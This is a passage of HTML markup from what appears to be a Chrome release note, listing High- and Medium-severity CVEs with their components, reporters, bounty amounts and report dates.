2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511735715"><span>511735715</span></a><span>]</span><span> High </span><span>CVE-2026-13816: Insufficient validation of untrusted input in File Input. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511739631"><span>511739631</span></a><span>]</span><span> High </span><span>CVE-2026-13817: Insufficient validation of untrusted input in Glic. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511823182"><span>511823182</span></a><span>]</span><span> High </span><span>CVE-2026-13818: Inappropriate implementation in Passwords. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512962749"><span>512962749</span></a><span>]</span><span> High </span><span>CVE-2026-13819: Out of bounds read in ANGLE. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512986879"><span>512986879</span></a><span>]</span><span> High </span><span>CVE-2026-13820: Out of bounds read in Skia. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513142445"><span>513142445</span></a><span>]</span><span> High </span><span>CVE-2026-13821: Use after free in Canvas. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513148038"><span>513148038</span></a><span>]</span><span> High </span><span>CVE-2026-13822: Inappropriate implementation in Extensions. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513163011"><span>513163011</span></a><span>]</span><span> High </span><span>CVE-2026-13823: Use after free in Glic. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513177497"><span>513177497</span></a><span>]</span><span> High </span><span>CVE-2026-13824: Insufficient validation of untrusted input in Extensions. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513209610"><span>513209610</span></a><span>]</span><span> High </span><span>CVE-2026-13825: Uninitialized Use in Dawn. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513237800"><span>513237800</span></a><span>]</span><span> High </span><span>CVE-2026-13826: Inappropriate implementation in Autofill. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513371963"><span>513371963</span></a><span>]</span><span> High </span><span>CVE-2026-13827: Use after free in Updater. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513399832"><span>513399832</span></a><span>]</span><span> High </span><span>CVE-2026-13828: Inappropriate implementation in Enterprise. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513490996"><span>513490996</span></a><span>]</span><span> High </span><span>CVE-2026-13829: Insufficient validation of untrusted input in Settings. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513727494"><span>513727494</span></a><span>]</span><span> High </span><span>CVE-2026-13830: Use after free in Chromoting. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513781328"><span>513781328</span></a><span>]</span><span> High </span><span>CVE-2026-13831: Use after free in GPU. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513822378"><span>513822378</span></a><span>]</span><span> High </span><span>CVE-2026-13832: Use after free in Headless. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513920082"><span>513920082</span></a><span>]</span><span> High </span><span>CVE-2026-13833: Uninitialized Use in ANGLE. </span><span>Reported by Google on 2026-05-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513925114"><span>513925114</span></a><span>]</span><span> High </span><span>CVE-2026-13834: Insufficient validation of untrusted input in ANGLE. </span><span>Reported by Google on 2026-05-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514338102"><span>514338102</span></a><span>]</span><span> High </span><span>CVE-2026-13835: Inappropriate implementation in XML. </span><span>Reported by Google on 2026-05-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514420555"><span>514420555</span></a><span>]</span><span> High </span><span>CVE-2026-13836: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514429130"><span>514429130</span></a><span>]</span><span> High </span><span>CVE-2026-13837: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514445398"><span>514445398</span></a><span>]</span><span> High </span><span>CVE-2026-13838: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514449396"><span>514449396</span></a><span>]</span><span> High </span><span>CVE-2026-13839: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-18<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/514609778"><span>514609778</span></a><span>]</span><span> High </span><span>CVE-2026-13840: Insufficient policy enforcement in Canvas. </span><span>Reported by Binglin Song on 2026-05-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/515467789"><span>515467789</span></a><span>]</span><span> High </span><span>CVE-2026-13841: Integer overflow in Skia. </span><span>Reported by Google on 2026-05-21<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/516836297"><span>516836297</span></a><span>]</span><span> High </span><span>CVE-2026-13842: Incorrect security UI in Chrome for iOS. </span><span>Reported by Azza Tegar Naufal Ataullah on 2026-05-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516869032"><span>516869032</span></a><span>]</span><span> High </span><span>CVE-2026-13843: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516926115"><span>516926115</span></a><span>]</span><span> High </span><span>CVE-2026-13844: Use after free in Updater. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516936863"><span>516936863</span></a><span>]</span><span> High </span><span>CVE-2026-13845: Use after free in DOM. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516999424"><span>516999424</span></a><span>]</span><span> High </span><span>CVE-2026-13846: Use after free in USB. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/517073397"><span>517073397</span></a><span>]</span><span> High </span><span>CVE-2026-13847: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/517345069"><span>517345069</span></a><span>]</span><span> High </span><span>CVE-2026-13848: Use after free in Forms. </span><span>Reported by Google on 2026-05-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/517351411"><span>517351411</span></a><span>]</span><span> High </span><span>CVE-2026-13849: Insufficient validation of untrusted input in Chromoting. </span><span>Reported by Google on 2026-05-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/517610676"><span>517610676</span></a><span>]</span><span> High </span><span>CVE-2026-13850: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/519692255"><span>519692255</span></a><span>]</span><span> High </span><span>CVE-2026-13851: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-06-03<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/522560124"><span>522560124</span></a><span>]</span><span> High </span><span>CVE-2026-13852: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-06-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/523224019"><span>523224019</span></a><span>]</span><span> High </span><span>CVE-2026-13853: Use after free in Journeys. </span><span>Reported by Google on 2026-06-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/523690961"><span>523690961</span></a><span>]</span><span> High </span><span>CVE-2026-13854: Use after free in Ozone. </span><span>Reported by Google on 2026-06-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/524395469"><span>524395469</span></a><span>]</span><span> High </span><span>CVE-2026-13855: Use after free in Ozone. </span><span>Reported by Google on 2026-06-16<br></span><span>[$8000][</span><a href="https://issues.chromium.org/issues/508092634"><span>508092634</span></a><span>]</span><span> Medium </span><span>CVE-2026-13856: Insufficient validation of untrusted input in Speech. </span><span>Reported by c6eed09fc8b174b0f3eebedcceb1e792 on 2026-04-30<br></span><span>[$5000][</span><a href="https://issues.chromium.org/issues/479203484"><span>479203484</span></a><span>]</span><span> Medium </span><span>CVE-2026-13857: Inappropriate implementation in Geometry. </span><span>Reported by Luan Herrera (@lbherrera_) on 2026-01-27<br></span><span>[$3000][</span><a href="https://issues.chromium.org/issues/507090179"><span>507090179</span></a><span>]</span><span> Medium </span><span>CVE-2026-13858: Out of bounds read in FFmpeg. </span><span>Reported by Wongi Lee (@_qwerty_po) of Theori with Xint Code, Jungwoo Lee (@physicube) on 2026-04-27<br></span><span>[$2000][</span><a href="https://issues.chromium.org/issues/484756087"><span>484756087</span></a><span>]</span><span> Medium </span><span>CVE-2026-13859: Inappropriate implementation in ANGLE. </span><span>Reported by Jason Villaluna on 2026-02-15<br></span><span>[$1000][</span><a href="https://issues.chromium.org/issues/417052041"><span>417052041</span></a><span>]</span><span> Medium </span><span>CVE-2026-13860: Incorrect security UI in Autofill. </span><span>Reported by Khalil Zhani on 2025-05-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/495456765"><span>495456765</span></a><span>]</span><span> Medium </span><span>CVE-2026-13861: Use after free in Core. </span><span>Reported by Google on 2026-03-23<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/495897416"><span>495897416</span></a><span>]</span><span> Medium </span><span>CVE-2026-13862: Insufficient policy enforcement in Web Authentication (Passkeys &amp; Security Keys). </span><span>Reported by Google on 2026-03-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496012495"><span>496012495</span></a><span>]</span><span> Medium </span><span>CVE-2026-13863: Insufficient validation of untrusted input in CustomTabs. </span><span>Reported by Google on 2026-03-25<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496399913"><span>496399913</span></a><span>]</span><span> Medium </span><span>CVE-2026-13864: Insufficient policy enforcement in WebHID. </span><span>Reported by Google on 2026-03-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497090912"><span>497090912</span></a><span>]</span><span> Medium </span><span>CVE-2026-13865: Insufficient validation of untrusted input in Enterprise. </span><span>Reported by Google on 2026-03-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497207698"><span>497207698</span></a><span>]</span><span> Medium </span><span>CVE-2026-13866: Insufficient validation of untrusted input in Input. </span><span>Reported by Google on 2026-03-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497345177"><span>497345177</span></a><span>]</span><span> Medium </span><span>CVE-2026-13867: Inappropriate implementation in Geolocation. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497453475"><span>497453475</span></a><span>]</span><span> Medium </span><span>CVE-2026-13868: Inappropriate implementation in Network. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497610642"><span>497610642</span></a><span>]</span><span> Medium </span><span>CVE-2026-13869: Use after free in Device. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497634837"><span>497634837</span></a><span>]</span><span> Medium </span><span>CVE-2026-13870: Use after free in WebView. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497961376"><span>497961376</span></a><span>]</span><span> Medium </span><span>CVE-2026-13871: Insufficient data validation in GuestView. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497977983"><span>497977983</span></a><span>]</span><span> Medium </span><span>CVE-2026-13872: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-03-31<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498085466"><span>498085466</span></a><span>]</span><span> Medium </span><span>CVE-2026-13873: Out of bounds memory access in Layout. </span><span>Reported by Google on 2026-03-31<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498411773"><span>498411773</span></a><span>]</span><span> Medium </span><span>CVE-2026-13874: Inappropriate implementation in DataTransfer. </span><span>Reported by Google on 2026-04-01<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498721671"><span>498721671</span></a><span>]</span><span> Medium </span><span>CVE-2026-13875: Insufficient validation of untrusted input in GPU. </span><span>Reported by Google on 2026-04-01<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498722200"><span>498722200</span></a><span>]</span><span> Medium </span><span>CVE-2026-13876: Inappropriate implementation in Network. </span><span>Reported by Google on 2026-04-01<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498820206"><span>498820206</span></a><span>]</span><span> Medium </span><span>CVE-2026-13877: Insufficient validation of untrusted input in ANGLE. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499007266"><span>499007266</span></a><span>]</span><span> Medium </span><span>CVE-2026-13878: Use after free in Bluetooth. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499022239"><span>499022239</span></a><span>]</span><span> Medium </span><span>CVE-2026-13879: Use after free in Bluetooth. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499025880"><span>499025880</span></a><span>]</span><span> Medium </span><span>CVE-2026-13880: Use after free in USB. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499100491"><span>499100491</span></a><span>]</span><span> Medium </span><span>CVE-2026-13881: Insufficient data validation in WebAppInstalls. </span><span>Reported by Google on 2026-04-03<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499162550"><span>499162550</span></a><span>]</span><span> Medium </span><span>CVE-2026-13882: Inappropriate implementation in USB. </span><span>Reported by Google on 2026-04-03<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500030250"><span>500030250</span></a><span>]</span><span> Medium </span><span>CVE-2026-13883: Type Confusion in ANGLE. </span><span>Reported by Google on 2026-04-06<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500077014"><span>500077014</span></a><span>]</span><span> Medium </span><span>CVE-2026-13884: Heap buffer overflow in Chromecast. </span><span>Reported by Google on 2026-04-06<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500474409"><span>500474409</span></a><span>]</span><span> Medium </span><span>CVE-2026-13885: Use after free in Skia. </span><span>Reported by Google on 2026-04-07<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500475136"><span>500475136</span></a><span>]</span><span> Medium </span><span>CVE-2026-13886: Policy bypass in Isolated Web Apps. </span><span>Reported by Google on 2026-04-07<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500508524"><span>500508524</span></a><span>]</span><span> Medium </span><span>CVE-2026-13887: Insufficient policy enforcement in NFC. </span><span>Reported by Google on 2026-04-08<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500566906"><span>500566906</span></a><span>]</span><span> Medium </span><span>CVE-2026-13888: Use after free in Extensions. </span><span>Reported by Google on 2026-04-08<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500588580"><span>500588580</span></a><span>]</span><span> Medium </span><span>CVE-2026-13889: Insufficient validation of untrusted input in WebAuthentication. </span><span>Reported by Google on 2026-04-08<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500601345"><span>500601345</span></a><span>]</span><span> Medium </span><span>CVE-2026-13890: Out of bounds read in Chromecast. </span><span>Reported by Google on 2026-04-08<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501631475"><span>501631475</span></a><span>]</span><span> Medium </span><span>CVE-2026-13891: Insufficient validation of untrusted input in Extensions. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501674841"><span>501674841</span></a><span>]</span><span> Medium </span><span>CVE-2026-13892: Inappropriate implementation in Chrome for iOS. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501729582"><span>501729582</span></a><span>]</span><span> Medium </span><span>CVE-2026-13893: Insufficient validation of untrusted input in WebUI. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501741117"><span>501741117</span></a><span>]</span><span> Medium </span><span>CVE-2026-13894: Insufficient policy enforcement in Network. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501770542"><span>501770542</span></a><span>]</span><span> Medium </span><span>CVE-2026-13895: Inappropriate implementation in Autofill. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501820076"><span>501820076</span></a><span>]</span><span> Medium </span><span>CVE-2026-13896: Insufficient policy enforcement in Glic. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501877896"><span>501877896</span></a><span>]</span><span> Medium </span><span>CVE-2026-13897: Insufficient policy enforcement in Chromecast. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501925480"><span>501925480</span></a><span>]</span><span> Medium </span><span>CVE-2026-13898: Use after free in Cast Receiver. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502109002"><span>502109002</span></a><span>]</span><span> Medium </span><span>CVE-2026-13899: Use after free in HTML. </span><span>Reported by Google on 2026-04-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502374993"><span>502374993</span></a><span>]</span><span> Medium </span><span>CVE-2026-13900: Insufficient validation of untrusted input in Chromecast. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503585173"><span>503585173</span></a><span>]</span><span> Medium </span><span>CVE-2026-13901: Insufficient validation of untrusted input in Serial. </span><span>Reported by Google on 2026-04-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503725717"><span>503725717</span></a><span>]</span><span> Medium </span><span>CVE-2026-13902: Inappropriate implementation in Chrome for iOS. </span><span>Reported by Google on 2026-04-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503912196"><span>503912196</span></a><span>]</span><span> Medium </span><span>CVE-2026-13903: Insufficient policy enforcement in Bluetooth. </span><span>Reported by Google on 2026-04-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504185807"><span>504185807</span></a><span>]</span><span> Medium </span><span>CVE-2026-13904: Incorrect security UI in Safe Browsing. </span><span>Reported by Google on 2026-04-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504192688"><span>504192688</span></a><span>]</span><span> Medium </span><span>CVE-2026-13905: Incorrect security UI in Chrome for iOS. </span><span>Reported by Google on 2026-04-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504613867"><span>504613867</span></a><span>]</span><span> Medium </span><span>CVE-2026-13906: Out of bounds read in Codecs. </span><span>Reported by Google on 2026-04-20<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/505156685"><span>505156685</span></a><span>]</span><span> Medium </span><span>CVE-2026-13907: Inappropriate implementation in iOSWeb. </span><span>Reported by Google on 2026-04-22<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/505242189"><span>505242189</span></a><span>]</span><span> Medium </span><span>CVE-2026-13908: Insufficient validation of untrusted input in Omnibox. </span><span>Reported by Google on 2026-04-22<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/505933538"><span>505933538</span></a><span>]</span><span> Medium </span><span>CVE-2026-13909: Insufficient policy enforcement in DevTools. </span><span>Reported by Google on 2026-04-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/507231605"><span>507231605</span></a><span>]</span><span> Medium </span><span>CVE-2026-13910: Insufficient policy enforcement in WebXR. </span><span>Reported by Google on 2026-04-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/507239830"><span>507239830</span></a><span>]</span><span> Medium </span><span>CVE-2026-13911: Insufficient data validation in Spellcheck. </span><span>Reported by Google on 2026-04-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508259433"><span>508259433</span></a><span>]</span><span> Medium </span><span>CVE-2026-13912: Incorrect security UI in Safe Browsing. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508260619"><span>508260619</span></a><span>]</span><span> Medium </span><span>CVE-2026-13913: Insufficient policy enforcement in Autofill. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508273690"><span>508273690</span></a><span>]</span><span> Medium </span><span>CVE-2026-13914: Inappropriate implementation in Passwords. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508275293"><span>508275293</span></a><span>]</span><span> Medium </span><span>CVE-2026-13915: Use after free in Chrome for iOS. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508283108"><span>508283108</span></a><span>]</span><span> Medium </span><span>CVE-2026-13916: Inappropriate implementation in Chrome for iOS. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508286935"><span>508286935</span></a><span>]</span><span> Medium </span><span>CVE-2026-13917: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/509712284"><span>509712284</span></a><span>]</span><span> Medium </span><span>CVE-2026-13918: Use after free in Chrome for iOS. </span><span>Reported by Google on 2026-05-05<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511249430"><span>511249430</span></a><span>]</span><span> Medium </span><span>CVE-2026-13919: Insufficient data validation in Extensions. </span><span>Reported by Google on 2026-05-08<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511722559"><span>511722559</span></a><span>]</span><span> Medium </span><span>CVE-2026-13920: Insufficient validation of untrusted input in Media. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511738175"><span>511738175</span></a><span>]</span><span> Medium </span><span>CVE-2026-13921: Insufficient validation of untrusted input in DeviceBoundSessionCredentials. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511748106"><span>511748106</span></a><span>]</span><span> Medium </span><span>CVE-2026-13922: Side-channel information leakage in Paint. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511772034"><span>511772034</span></a><span>]</span><span> Medium </span><span>CVE-2026-13923: Uninitialized Use in GPU. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511784747"><span>511784747</span></a><span>]</span><span> Medium </span><span>CVE-2026-13924: Insufficient validation of untrusted input in WebView. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511802911"><span>511802911</span></a><span>]</span><span> Medium </span><span>CVE-2026-13925: Inappropriate implementation in Downloads. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511814550"><span>511814550</span></a><span>]</span><span> Medium </span><span>CVE-2026-13926: Insufficient validation of untrusted input in Network. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511826446"><span>511826446</span></a><span>]</span><span> Medium </span><span>CVE-2026-13927: Insufficient validation of untrusted input in UI. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512162479"><span>512162479</span></a><span>]</span><span> Medium </span><span>CVE-2026-13928: Insufficient validation of untrusted input in Enterprise. </span><span>Reported by Google on 2026-05-11<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/512249559"><span>512249559</span></a><span>]</span><span> Medium </span><span>CVE-2026-13929: Insufficient validation of untrusted input in DevTools. </span><span>Reported by LegioSec on 2026-05-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512937764"><span>512937764</span></a><span>]</span><span> Medium </span><span>CVE-2026-13930: Insufficient policy enforcement in Actor. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512997441"><span>512997441</span></a><span>]</span><span> Medium </span><span>CVE-2026-13931: Inappropriate implementation in Media. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513001690"><span>513001690</span></a><span>]</span><span> Medium </span><span>CVE-2026-13932: Inappropriate implementation in Sharing. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513002625"><span>513002625</span></a><span>]</span><span> Medium </span><span>CVE-2026-13933: Insufficient policy enforcement in Passwords. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513006636"><span>513006636</span></a><span>]</span><span> Medium </span><span>CVE-2026-13934: Insufficient validation of untrusted input in Dawn. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513009005"><span>513009005</span></a><span>]</span><span> Medium </span><span>CVE-2026-13935: Side-channel information leakage in ComputePressure. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513044658"><span>513044658</span></a><span>]</span><span> Medium </span><span>CVE-2026-13936: Inappropriate implementation in Passwords. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513046494"><span>513046494</span></a><span>]</span><span> Medium </span><span>CVE-2026-13937: Insufficient policy enforcement in Passwords. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513143921"><span>513143921</span></a><span>]</span><span> Medium </span><span>CVE-2026-13938: Integer overflow in Fonts. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513149760"><span>513149760</span></a><span>]</span><span> Medium </span><span>CVE-2026-13939: Insufficient validation of untrusted input in WebShare. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513158425"><span>513158425</span></a><span>]</span><span> Medium </span><span>CVE-2026-13940: Uninitialized Use in Cast. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513183855"><span>513183855</span></a><span>]</span><span> Medium </span><span>CVE-2026-13941: Inappropriate implementation in SiteSettings. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513186670"><span>513186670</span></a><span>]</span><span> Medium </span><span>CVE-2026-13942: Insufficient validation of untrusted input in Video Capture. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513204116"><span>513204116</span></a><span>]</span><span> Medium </span><span>CVE-2026-13943: Uninitialized Use in CSS. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513224212"><span>513224212</span></a><span>]</span><span> Medium </span><span>CVE-2026-13944: Inappropriate implementation in DataTransfer. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513226551"><span>513226551</span></a><span>]</span><span> Medium </span><span>CVE-2026-13945: Insufficient policy enforcement in Extensions. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513274039"><span>513274039</span></a><span>]</span><span> Medium </span><span>CVE-2026-13946: Inappropriate implementation in ScriptInjections. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513280648"><span>513280648</span></a><span>]</span><span> Medium </span><span>CVE-2026-13947: Uninitialized Use in XR. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513286820"><span>513286820</span></a><span>]</span><span> Medium </span><span>CVE-2026-13948: Insufficient policy enforcement in Extensions. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513311569"><span>513311569</span></a><span>]</span><span> Medium </span><span>CVE-2026-13949: Insufficient policy enforcement in Payments. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513360781"><span>513360781</span></a><span>]</span><span> Medium </span><span>CVE-2026-13950: Uninitialized Use in GPU. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513394321"><span>513394321</span></a><span>]</span><span> Medium </span><span>CVE-2026-13951: Policy bypass in USB. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513401808"><span>513401808</span></a><span>]</span><span> Medium </span><span>CVE-2026-13952: Inappropriate implementation in PerformanceAPIs. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513459192"><span>513459192</span></a><span>]</span><span> Medium </span><span>CVE-2026-13953: Inappropriate implementation in SplitView. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513504934"><span>513504934</span></a><span>]</span><span> Medium </span><span>CVE-2026-13954: Insufficient policy enforcement in XML. </span><span>Reported by Google on 